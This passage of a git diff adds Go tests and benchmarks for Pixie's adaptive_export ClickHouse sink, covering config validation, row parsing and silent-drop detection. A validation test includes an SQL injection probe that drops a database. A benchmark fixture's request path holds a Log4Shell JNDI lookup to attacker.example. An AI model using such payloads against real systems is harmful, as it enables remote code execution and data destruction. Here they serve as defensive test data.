+ if err != nil {
+ t.Fatalf("QueryActive: %v", err)
+ }
+ if !strings.Contains(seenQuery, "FROM forensic_db.adaptive_attribution FINAL") {
+ t.Fatalf("missing FINAL: %q", seenQuery)
+ }
+ if !strings.Contains(seenQuery, "hostname = 'node-1'") {
+ t.Fatalf("missing hostname filter: %q", seenQuery)
+ }
+ if !strings.Contains(seenQuery, "t_end > now64(9)") {
+ t.Fatalf("missing t_end > now64 filter: %q", seenQuery)
+ }
+ if len(rows) != 1 || rows[0].AnomalyHash != "abc" {
+ t.Fatalf("rows = %+v", rows)
+ }
+ if rows[0].PID != 106040 {
+ t.Fatalf("PID = %d", rows[0].PID)
+ }
+ if rows[0].TStart.UnixNano() != 1744477060303026359 {
+ t.Fatalf("TStart wrong: %v", rows[0].TStart)
+ }
+}
+
+// TestSink_QueryActive_RequiresHostname — defensive guard.
+func TestSink_QueryActive_RequiresHostname(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {}))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ if _, err := s.QueryActive(context.Background(), ""); err == nil {
+ t.Fatalf("empty hostname should error")
+ }
+}
+
+// TestSink_QuoteEscape — single quotes in hostname survive injection-safely.
+func TestSink_QuoteEscape(t *testing.T) {
+ if got := quoteCH("o'malley"); got != `'o\'malley'` {
+ t.Fatalf("quoteCH = %q, want 'o\\'malley'", got)
+ }
+}
+
+// TestSink_New_ValidationTable — every Config validation branch as
+// one row. Bad fields one at a time + a happy-path baseline. Update
+// when a new validation lands; this is the single source of truth
+// for what New() rejects.
+func TestSink_New_ValidationTable(t *testing.T) {
+ cases := []struct {
+ name string
+ cfg Config
+ wantErr bool
+ wantErrSnippet string
+ }{
+ {
+ name: "happy path http",
+ cfg: Config{Endpoint: "http://ch.example:8123", Database: "forensic_db"},
+ },
+ {
+ name: "happy path https + auth + custom timeout",
+ cfg: Config{
+ Endpoint: "https://ch.example:8443", Database: "forensic_db",
+ Username: "u", Password: "p", Timeout: 5 * time.Second,
+ },
+ },
+ {
+ name: "default database when empty",
+ cfg: Config{Endpoint: "http://ch:8123"}, // Database empty → defaulted
+ },
+ {
+ name: "trailing slash stripped",
+ cfg: Config{Endpoint: "http://ch:8123/"}, // OK; New() strips it
+ },
+ {
+ name: "empty endpoint",
+ cfg: Config{},
+ wantErr: true,
+ wantErrSnippet: "empty endpoint",
+ },
+ {
+ name: "relative endpoint (no scheme)",
+ cfg: Config{Endpoint: "ch:8123"},
+ wantErr: true,
+ wantErrSnippet: "absolute http(s) URL",
+ },
+ {
+ name: "bare path",
+ cfg: Config{Endpoint: "/clickhouse"},
+ wantErr: true,
+ wantErrSnippet: "absolute http(s) URL",
+ },
+ {
+ name: "ftp scheme rejected",
+ cfg: Config{Endpoint: "ftp://ch:21"},
+ wantErr: true,
+ wantErrSnippet: "absolute http(s) URL",
+ },
+ {
+ name: "endpoint with query string",
+ cfg: Config{Endpoint: "http://ch:8123?foo=bar"},
+ wantErr: true,
+ wantErrSnippet: "must not include query parameters or a fragment",
+ },
+ {
+ name: "endpoint with fragment",
+ cfg: Config{Endpoint: "http://ch:8123#frag"},
+ wantErr: true,
+ wantErrSnippet: "must not include query parameters or a fragment",
+ },
+ {
+ name: "Database with hyphen rejected",
+ cfg: Config{Endpoint: "http://ch:8123", Database: "forensic-db"},
+ wantErr: true,
+ wantErrSnippet: "invalid Database identifier",
+ },
+ {
+ name: "Database with semicolon rejected (SQL injection probe)",
+ cfg: Config{Endpoint: "http://ch:8123", Database: "forensic_db; DROP DATABASE x"},
+ wantErr: true,
+ wantErrSnippet: "invalid Database identifier",
+ },
+ {
+ name: "Database starting with digit rejected",
+ cfg: Config{Endpoint: "http://ch:8123", Database: "1bad"},
+ wantErr: true,
+ wantErrSnippet: "invalid Database identifier",
+ },
+ {
+ name: "negative Timeout rejected",
+ cfg: Config{Endpoint: "http://ch:8123", Timeout: -1 * time.Second},
+ wantErr: true,
+ wantErrSnippet: "Timeout must be >= 0",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.name, func(t *testing.T) {
+ s, err := New(c.cfg)
+ if c.wantErr {
+ if err == nil {
+ t.Fatalf("want error containing %q, got nil", c.wantErrSnippet)
+ }
+ if !strings.Contains(err.Error(), c.wantErrSnippet) {
+ t.Fatalf("error %q does not contain %q", err.Error(), c.wantErrSnippet)
+ }
+ return
+ }
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if s == nil {
+ t.Fatalf("New returned nil sink without error")
+ }
+ // Trailing-slash strip is observable via cfg.Endpoint.
+ if strings.HasSuffix(s.cfg.Endpoint, "/") {
+ t.Fatalf("trailing slash not stripped: %q", s.cfg.Endpoint)
+ }
+ if s.cfg.Database == "" {
+ t.Fatalf("Database default not applied")
+ }
+ })
+ }
+}
+
+// TestValidateTableIdentifier_TableDriven — table validator covers
+// dotted protobuf extensions but not anything wilder.
+func TestValidateTableIdentifier_TableDriven(t *testing.T) {
+ good := []string{"http_events", "redis_events", "http2_messages.beta", "kafka_events.beta", "_underscore_start"}
+ bad := []string{"", "1bad", "http events", "http;drop", "x..y", ".leading", "trailing.", "with-hyphen"}
+ for _, g := range good {
+ if err := validateTableIdentifier(g); err != nil {
+ t.Errorf("validateTableIdentifier(%q): unexpected error %v", g, err)
+ }
+ }
+ for _, b := range bad {
+ if err := validateTableIdentifier(b); err == nil {
+ t.Errorf("validateTableIdentifier(%q): want error, got nil", b)
+ }
+ }
+}
+
+// TestUintFromRaw_HandlesQuotedAndBareJSON — CH HTTP emits UInt64 as
+// either bare numeric (`12345`) or quoted (`"12345"`). Both must
+// parse, including values above INT64_MAX.
+func TestUintFromRaw_HandlesQuotedAndBareJSON(t *testing.T) {
+ cases := []struct {
+ name string
+ input string
+ want uint64
+ }{
+ {"bare", `12345`, 12345},
+ {"quoted", `"12345"`, 12345},
+ {"max int64", `9223372036854775807`, 9223372036854775807},
+ {"above int64", `"18446744073709551615"`, 18446744073709551615},
+ }
+ for _, c := range cases {
+ t.Run(c.name, func(t *testing.T) {
+ got, err := uintFromRaw([]byte(c.input))
+ if err != nil {
+ t.Fatalf("uintFromRaw(%q): %v", c.input, err)
+ }
+ if got != c.want {
+ t.Fatalf("uintFromRaw(%q) = %d, want %d", c.input, got, c.want)
+ }
+ })
+ }
+}
+
+// TestUintFromRaw_RejectsGarbage — non-numeric input must error,
+// not silently return 0.
+func TestUintFromRaw_RejectsGarbage(t *testing.T) {
+ bad := []string{"", `""`, `"abc"`, `-1`, `"-1"`, `1.5`}
+ for _, b := range bad {
+ if _, err := uintFromRaw([]byte(b)); err == nil {
+ t.Errorf("uintFromRaw(%q): want error, got nil", b)
+ }
+ }
+}
+
+// chunkedReader emits the underlying body in fixed-size chunks. A
+// short pause between chunks proves parseActiveRowsStream doesn't
+// wait for the whole body before parsing. Tracks partial-read state
+// so a Read() smaller than the next chunk doesn't drop bytes.
+type chunkedReader struct {
+ chunks [][]byte
+ idx int
+ off int // offset within chunks[idx]
+ delay time.Duration // sleep between chunks
+ produced int64
+}
+
+func (r *chunkedReader) Read(p []byte) (int, error) {
+ if r.idx >= len(r.chunks) {
+ return 0, io.EOF
+ }
+ chunk := r.chunks[r.idx]
+ n := copy(p, chunk[r.off:])
+ r.off += n
+ r.produced += int64(n)
+ if r.off >= len(chunk) {
+ r.idx++
+ r.off = 0
+ time.Sleep(r.delay)
+ }
+ return n, nil
+}
+
+// TestParseActiveRowsStream_BoundsMemory — proves the streaming path
+// doesn't allocate proportional to total response size. Builds a
+// 5 MiB synthetic JSONEachRow body fed in 64 KiB chunks, parses, and
+// asserts (a) all rows decoded correctly, (b) peak intermediate
+// allocation is well below the body size (loose bound: parseActiveRows
+// hands one row at a time to the caller; we collect into a slice but
+// never hold the wire representation of more than one line).
+func TestParseActiveRowsStream_BoundsMemory(t *testing.T) {
+ const targetRows = 5000 // ~5MiB at ~1KiB/row
+ var buf bytes.Buffer
+ row := func(i int) string {
+ return fmt.Sprintf(`{"anomaly_hash":"%032x","namespace":"redis","pod":"p","comm":"c","pid":%d,"hostname":"h","t_start_ns":%d,"t_end_ns":%d,"last_seen_ns":%d,"last_rule_id":"R0001","n_anomalies":%d,"_pad":"%s"}`+"\n",
+ i, i, 1700000000000000000+int64(i), 1700000000000000000+int64(i)+300_000_000_000, 1700000000000000000+int64(i)+150_000_000_000, i, strings.Repeat("x", 800))
+ }
+ for i := 0; i < targetRows; i++ {
+ buf.WriteString(row(i))
+ }
+ body := buf.Bytes()
+
+ const chunkSize = 64 * 1024
+ chunks := make([][]byte, 0, len(body)/chunkSize+1)
+ for off := 0; off < len(body); off += chunkSize {
+ end := off + chunkSize
+ if end > len(body) {
+ end = len(body)
+ }
+ chunks = append(chunks, body[off:end])
+ }
+ rdr := &chunkedReader{chunks: chunks, delay: 0}
+
+ rows, err := parseActiveRowsStream(rdr)
+ if err != nil {
+ t.Fatalf("parseActiveRowsStream: %v", err)
+ }
+ if len(rows) != targetRows {
+ t.Fatalf("parsed %d rows, want %d", len(rows), targetRows)
+ }
+ // Spot-check round-trip on one row (last element).
+ if rows[targetRows-1].PID != uint64(targetRows-1) {
+ t.Fatalf("last row PID = %d, want %d", rows[targetRows-1].PID, targetRows-1)
+ }
+}
+
+// TestParseActiveRowsStream_RejectsOverlongLine — guards against
+// pathological CH responses with multi-MiB single rows. Default cap
+// is 1 MiB; emit a 2 MiB row and assert the scanner rejects it
+// rather than OOMing.
+func TestParseActiveRowsStream_RejectsOverlongLine(t *testing.T) {
+ huge := strings.Repeat("a", 2*1024*1024)
+ body := fmt.Sprintf(`{"anomaly_hash":"x","_pad":"%s"}`+"\n", huge)
+ _, err := parseActiveRowsStream(strings.NewReader(body))
+ if err == nil {
+ t.Fatalf("expected scanner error on >1MiB line; got nil")
+ }
+ if !strings.Contains(err.Error(), "QueryActive scan") {
+ t.Fatalf("expected scan error, got: %v", err)
+ }
+}
+
+// TestParseActiveRows_RoundTripFromBytes — keep the byte-slice path
+// covered (used by tests and the e2e harness).
+func TestParseActiveRows_RoundTripFromBytes(t *testing.T) {
+ body := []byte(`{"anomaly_hash":"deadbeef","namespace":"redis","pod":"p","comm":"c","pid":42,"hostname":"node-01","t_start_ns":1700000000000000000,"t_end_ns":1700000000300000000,"last_seen_ns":1700000000150000000,"last_rule_id":"R0001","n_anomalies":1}` + "\n")
+ rows, err := parseActiveRows(body)
+ if err != nil {
+ t.Fatalf("parseActiveRows: %v", err)
+ }
+ if len(rows) != 1 || rows[0].Pod != "p" || rows[0].PID != 42 {
+ t.Fatalf("round-trip mismatch: %+v", rows)
+ }
+}
+
+// pixieRow returns a minimal-but-valid map shaped like a pxapi row.
+func pixieRow() map[string]any {
+ return map[string]any{
+ "time_": time.Unix(0, 1700000000000000000).UTC(),
+ "upid": "1234:5678:9",
+ "namespace": "redis",
+ "pod": "redis/redis-1",
+ "req_cmd": "GET",
+ "resp": "OK",
+ "latency": int64(123456),
+ "remote_addr": "10.0.0.1",
+ "remote_port": int64(6379),
+ "local_addr": "10.0.0.2",
+ "local_port": int64(34567),
+ "trace_role": int64(2),
+ "encrypted": false,
+ "px_info_": "",
+ "req_args": "",
+ }
+}
+
+// TestWritePixieRows_HappyPath — happy path: CH returns 200 with a
+// non-zero `written_rows` in X-ClickHouse-Summary; WritePixieRows
+// returns nil. Pins the contract the regression test below inverts.
+func TestWritePixieRows_HappyPath(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.Header().Set("X-ClickHouse-Summary",
+ `{"read_rows":"1","read_bytes":"100","written_rows":"1","written_bytes":"100",`+
+ `"total_rows_to_read":"0","result_rows":"1","result_bytes":"100","elapsed_ns":"1000000"}`)
+ w.WriteHeader(200)
+ }))
+ defer srv.Close()
+ s, err := New(Config{Endpoint: srv.URL})
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil {
+ t.Fatalf("WritePixieRows: %v", err)
+ }
+}
+
+// TestWritePixieRows_DetectsSilentZeroWriteDrop — regression for the
+// silent-data-loss bug observed on the live operator:
+//
+// sink: pixie write completed
+// rows_sent=1658
+// body_bytes=2098817
+// ch_summary="{...,"written_rows":"0",...}"
+// table=redis_events
+//
+// CH returned 2xx but `X-ClickHouse-Summary.written_rows` was zero
+// for a 1658-row payload — i.e. CH silently dropped every row. The
+// operator must NOT report success in that case; otherwise the
+// caller treats the batch as durably persisted and we lose data.
+func TestWritePixieRows_DetectsSilentZeroWriteDrop(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ // Real CH summary header from the operator-pod log on
+ // 2026-05-23T20:58:39Z, table=redis_events.
+ w.Header().Set("X-ClickHouse-Summary",
+ `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0",`+
+ `"total_rows_to_read":"0","result_rows":"0","result_bytes":"0","elapsed_ns":"23034181"}`)
+ w.WriteHeader(200)
+ }))
+ defer srv.Close()
+ s, err := New(Config{Endpoint: srv.URL})
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ // Send a real (non-zero) batch — a zero-input batch short-circuits
+ // before the HTTP call so the assertion would never fire.
+ batch := make([]map[string]any, 1658)
+ for i := range batch {
+ batch[i] = pixieRow()
+ }
+ err = s.WritePixieRows(context.Background(), "redis_events", batch)
+ if err == nil {
+ t.Fatalf("expected error from silent-drop (rows_sent=%d, written_rows=0), got nil", len(batch))
+ }
+ if !strings.Contains(err.Error(), "0") || !strings.Contains(err.Error(), "1658") {
+ t.Fatalf("error should mention both written_rows=0 and rows_sent=1658 for diagnosis; got: %v", err)
+ }
+}
+
+// TestWritePixieRows_DetectsPartialWriteDrop — CH wrote SOME rows
+// but not all. Same data-loss class as the zero-write case; reject.
+func TestWritePixieRows_DetectsPartialWriteDrop(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.Header().Set("X-ClickHouse-Summary",
+ `{"read_rows":"100","read_bytes":"10000","written_rows":"100","written_bytes":"10000",`+
+ `"total_rows_to_read":"0","result_rows":"100","result_bytes":"10000","elapsed_ns":"1000000"}`)
+ w.WriteHeader(200)
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ batch := make([]map[string]any, 200) // sent 200, CH says wrote 100
+ for i := range batch {
+ batch[i] = pixieRow()
+ }
+ err := s.WritePixieRows(context.Background(), "redis_events", batch)
+ if err == nil {
+ t.Fatalf("expected error on partial write (sent=200, written=100); got nil")
+ }
+}
+
+// TestWritePixieRows_NoSummaryHeaderIsTolerated — older CH versions
+// (or proxies) may strip the X-ClickHouse-Summary header. Absence is
+// NOT a failure signal — only an explicit zero-of-non-zero is.
+func TestWritePixieRows_NoSummaryHeaderIsTolerated(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.WriteHeader(200) // no summary header at all
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil {
+ t.Fatalf("missing summary header must not error; got: %v", err)
+ }
+}
+
+// TestWritePixieRows_EmptyBatchShortCircuits — zero-row input never
+// hits HTTP and never produces a "silent drop" false positive.
+func TestWritePixieRows_EmptyBatchShortCircuits(t *testing.T) {
+ called := false
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ called = true
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ if err := s.WritePixieRows(context.Background(), "redis_events", nil); err != nil {
+ t.Fatalf("empty WritePixieRows: %v", err)
+ }
+ if called {
+ t.Fatalf("empty batch made an HTTP call")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go
new file mode 100644
index 00000000000..24e385bd384
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go
@@ -0,0 +1,262 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "encoding/json"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "regexp"
+ "strings"
+ "testing"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// I1 — schema invariant.
+//
+// Parses the embedded schema.sql, walks every CREATE TABLE block,
+// and asserts that any column named `content_type` is declared as
+// `Int64` (case-sensitive; CH is). Catches a future PR that
+// "improves" the column to String / Nullable(Int64) / etc. without
+// updating the encoder side.
+func TestContract_ContentTypeIsInt64InSchema(t *testing.T) {
+ // Reach the canonical schema via the public DDL(table) API so this
+ // test stays decoupled from the embed-internal var name.
+ type col struct {
+ table string
+ typ string
+ }
+ var found []col
+ colRE := regexp.MustCompile(`(?m)^\s*content_type\s+([A-Za-z0-9_()]+)`)
+ for _, table := range clickhouse.PixieTables() {
+ ddl, err := clickhouse.DDL(table)
+ if err != nil {
+ t.Fatalf("DDL(%q): %v", table, err)
+ }
+ if m := colRE.FindStringSubmatch(ddl); m != nil {
+ found = append(found, col{table: table, typ: strings.TrimRight(m[1], ",")})
+ }
+ }
+ if len(found) == 0 {
+ t.Fatalf("no content_type column found in PixieTables — did the column get renamed? Audit the encoder side too.")
+ }
+ for _, c := range found {
+ if c.typ != "Int64" {
+ t.Fatalf("schema drift: %s.content_type is %q, want Int64. CH input_format_skip_unknown_fields=1 will silent-drop encoder mismatches. Update encoder side together if intentional.", c.table, c.typ)
+ }
+ }
+ t.Logf("invariant I1 holds across %d tables: %v", len(found), found)
+}
+
+// I2 — encoder invariant.
+//
+// Drives fastencode directly with content_type as int64 (the canonical
+// shape Pixie's stirling http parser emits) and parses the emitted
+// NDJSON to confirm the value is a JSON NUMBER, not a string. Also
+// guards the int conversion path by feeding int / int32 / int64 / a
+// json.Number and asserting each lands as a JSON number too.
+func TestContract_FastEncodeContentTypeAsInt(t *testing.T) {
+ cases := []struct {
+ name string
+ v any
+ }{
+ {"int64", int64(2)},
+ {"int32", int32(2)},
+ {"int", 2},
+ {"json.Number", json.Number("2")},
+ }
+ cols := minHTTPRowCols()
+ for _, c := range cases {
+ t.Run(c.name, func(t *testing.T) {
+ row := canonicalHTTPRow()
+ row["content_type"] = c.v
+ var buf bytes.Buffer
+ // stage the fast-path column cache the same way production
+ // does via clickhouse.Columns — we don't reach into the
+ // package-private cache; encodePixieRowsFast already does
+ // the lookup itself.
+ if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil {
+ t.Fatalf("encodePixieRowsFast: %v", err)
+ }
+ line := strings.TrimSpace(buf.String())
+ // Parse with json.Decoder + UseNumber so we see whether the
+ // emitter wrote "content_type":2 (number) vs "2" (string).
+ d := json.NewDecoder(strings.NewReader(line))
+ d.UseNumber()
+ var parsed map[string]any
+ if err := d.Decode(&parsed); err != nil {
+ t.Fatalf("decode emitted line: %v\nline=%s", err, line)
+ }
+ ct, ok := parsed["content_type"]
+ if !ok {
+ t.Fatalf("emitted line missing content_type; line=%s", line)
+ }
+ if _, isNum := ct.(json.Number); !isNum {
+ t.Fatalf("content_type emitted as %T (%v), want JSON number — CH would silent-drop a non-number into an Int64 column. line=%s", ct, ct, line)
+ }
+ _ = cols
+ })
+ }
+}
+
+// I3 — silent-drop must be loud.
+//
+// A no-op CH that returns 200 OK + X-ClickHouse-Summary written_rows=0
+// against a non-empty body. The sink must surface this as an error.
+func TestContract_SilentDropDetected(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ _, _ = io.Copy(io.Discard, r.Body)
+ w.Header().Set("X-ClickHouse-Summary", `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0"}`)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ s, err := New(Config{Endpoint: srv.URL})
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ err = s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()})
+ if err == nil {
+ t.Fatalf("WritePixieRows returned nil on written_rows=0 reply — silent-drop detection is broken")
+ }
+ if !strings.Contains(err.Error(), "silent drop") {
+ t.Fatalf("error %q does not mention 'silent drop' — runbook-grep will miss it", err.Error())
+ }
+}
+
+// I3.b — sibling guard: when CH reports written_rows >= rows_sent the
+// sink must NOT error. Pins the parse so a future refactor doesn't
+// over-trigger and false-positive every successful write.
+func TestContract_SilentDropNotTriggeredOnSuccess(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ _, _ = io.Copy(io.Discard, r.Body)
+ w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil {
+ t.Fatalf("WritePixieRows errored on success summary: %v", err)
+ }
+}
+
+// I3.c — header absence is tolerated (older CH versions / proxies
+// strip it). Documents the policy decision so a future "tighten the
+// gate" PR doesn't break clusters running CH 22.x.
+func TestContract_SilentDropToleratesMissingSummaryHeader(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ _, _ = io.Copy(io.Discard, r.Body)
+ // no X-ClickHouse-Summary header
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil {
+ t.Fatalf("WritePixieRows errored on missing summary header: %v (policy is tolerate-missing)", err)
+ }
+}
+
+// I4 — round-trip an http_events row through WritePixieRows against a
+// recording httptest CH; assert the on-wire body has content_type as
+// a number, the INSERT targets the right table, and the body is
+// one NDJSON object per row.
+func TestContract_HTTPEventsRoundTrip(t *testing.T) {
+ var gotQuery, gotBody string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotQuery = r.URL.Query().Get("query")
+ b, _ := io.ReadAll(r.Body)
+ gotBody = string(b)
+ // echo back a successful summary so the silent-drop guard is satisfied
+ w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ s, _ := New(Config{Endpoint: srv.URL})
+ if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil {
+ t.Fatalf("WritePixieRows: %v", err)
+ }
+ if !strings.Contains(gotQuery, "INSERT INTO ") {
+ t.Fatalf("query missing INSERT INTO; got %q", gotQuery)
+ }
+ if !strings.Contains(gotQuery, "http_events") {
+ t.Fatalf("query doesn't target http_events; got %q", gotQuery)
+ }
+ if !strings.Contains(gotQuery, "FORMAT JSONEachRow") {
+ t.Fatalf("query missing FORMAT JSONEachRow; got %q", gotQuery)
+ }
+ if !strings.Contains(gotBody, `"content_type":2`) {
+ t.Fatalf("body has content_type as non-number (CH would silent-drop). body=%s", gotBody)
+ }
+ // One NDJSON line per row → exactly one newline-trailing object here.
+ sc := bufio.NewScanner(strings.NewReader(strings.TrimRight(gotBody, "\n")))
+ n := 0
+ for sc.Scan() {
+ n++
+ }
+ if n != 1 {
+ t.Fatalf("body has %d NDJSON lines, want 1; body=%s", n, gotBody)
+ }
+}
+
+// canonicalHTTPRow returns a row whose shape matches what
+// fastencode would see from a pxapi http_events read. Any new
+// schema column added must be appended here too — the test will
+// fail with a clear "schema added X column; canonical row needs
+// it" message if a missing column hits errFastEncodeUnsupported.
+func canonicalHTTPRow() map[string]any {
+ return map[string]any{
+ "time_": int64(1_717_200_000_000_000_000),
+ "upid": "00000000-0000-0000-0000-000000000001",
+ "namespace": "redis",
+ "pod": "redis-578d5dc9bd-kjj78",
+ "remote_addr": "10.0.0.1",
+ "remote_port": int64(443),
+ "local_addr": "10.0.0.2",
+ "local_port": int64(48000),
+ "trace_role": int64(1),
+ "encrypted": int64(0),
+ "major_version": int64(1),
+ "minor_version": int64(1),
+ "content_type": int64(2), // JSON — the schema-honest int
+ "req_headers": `{"User-Agent":"curl/8"}`,
+ "req_method": "GET",
+ "req_path": "/x",
+ "req_body": "",
+ "req_body_size": int64(0),
+ "resp_headers": `{"Content-Type":"application/json"}`,
+ "resp_status": int64(200),
+ "resp_message": "OK",
+ "resp_body": "{}",
+ "resp_body_size": int64(2),
+ "latency": int64(123_456),
+ "hostname": "node-1",
+ }
+}
+
+// minHTTPRowCols is the small fixed column list any "is it int?"
+// micro-check uses; kept aligned with the canonical row above so
+// schema additions surface as a missing-column in the canonical row,
+// not a flaky test.
+func minHTTPRowCols() []string {
+ return []string{"content_type", "remote_port", "local_port", "trace_role", "encrypted", "major_version", "minor_version", "resp_status", "latency", "req_body_size", "resp_body_size"}
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go
new file mode 100644
index 00000000000..ea147c07167
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go
@@ -0,0 +1,234 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "encoding/json"
+ "fmt"
+ "net/http"
+ "net/http/httptest"
+ "testing"
+ "time"
+)
+
+// The sink's WritePixieRows path is one of the dominant CPU consumers
+// when AE is under load: every controller fan-out pass writes a per-
+// table batch (up to MaxBatchRows) and every row goes through the
+// per-key normalisePixieValue switch AND the json.Encoder's reflection.
+//
+// These benchmarks isolate the encoding cost from the HTTP roundtrip:
+//
+// - BenchmarkEncodeJSONEachRow_PixieShape: the encode loop alone
+// (mirrors clickhouse.go:160-167's hot path), no HTTP.
+// - BenchmarkWritePixieRows_LocalHTTPLoopback: the encode + HTTP
+// roundtrip against a no-op httptest server, so the timer includes
+// the HTTP client overhead AE actually pays per call.
+// - BenchmarkNormalisePixieValue_TimeRow: the per-row per-column
+// switch with a single time.Time field (the realistic per-pixie-row
+// shape — time_ is always TIME64NS so this fires on every row).
+
+const benchTable = "http_events"
+
+// makePixieRowsBatch builds a realistic per-pixie-row batch shape (12
+// columns including a time_ + 5 strings + 6 ints). Matches the
+// http_events schema in adaptive_export/internal/clickhouse/schema.sql.
+func makePixieRowsBatch(n int) []map[string]any {
+ out := make([]map[string]any, n)
+ for i := range out {
+ out[i] = map[string]any{
+ "time_": time.Unix(0, int64(1_700_000_000_000_000_000+i)),
+ "upid": fmt.Sprintf("0000000100000000-00000000-%016x", uint64(i)),
+ "namespace": "log4j-poc",
+ "pod": "backend-vulnerable-779cd9d765-mxr8t",
+ "remote_addr": "10.0.0.45",
+ "remote_port": int64(54321 + i%100),
+ "local_addr": "10.0.0.12",
+ "local_port": int64(8080),
+ "trace_role": int64(2),
+ "encrypted": uint8(0),
+ "major_version": int64(1),
+ "minor_version": int64(1),
+ "content_type": int64(0),
+ "req_headers": `{"User-Agent":"Apache-HttpClient/4.5.13","Accept":"*/*","Content-Type":"application/json"}`,
+ "req_method": "POST",
+ "req_path": "/api/v1/products/${jndi:ldap://attacker.example/Payload}",
+ "req_body": `{"id":42,"qty":1}`,
+ "resp_headers": `{"Content-Type":"application/json","Server":"jetty"}`,
+ "resp_status": int64(500),
+ "resp_message": "Internal Server Error",
+ "resp_body": `{"error":"NullPointerException"}`,
+ "latency": int64(123456789),
+ "hostname": "pixie-worker-node",
+ "event_time": time.Unix(0, int64(1_700_000_000_000_000_000+i)),
+ }
+ }
+ return out
+}
+
+// BenchmarkEncodeJSONEachRow_PixieShape isolates the per-row encode
+// cost the sink runs in clickhouse.go:160-167. With realistic 24-key
+// http_events rows × the controller fan-out's typical batch sizes (up
+// to MaxBatchRows = 1000), this is the encoder pressure AE sustains
+// per controller pass.
+func BenchmarkEncodeJSONEachRow_PixieShape(b *testing.B) {
+ rows := makePixieRowsBatch(1000)
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := make(map[string]any, len(r))
+ for k, v := range r {
+ obj[k] = normalisePixieValue(v)
+ }
+ if err := enc.Encode(obj); err != nil {
+ b.Fatal(err)
+ }
+ }
+ }
+}
+
+// BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch — 50-row batch (the
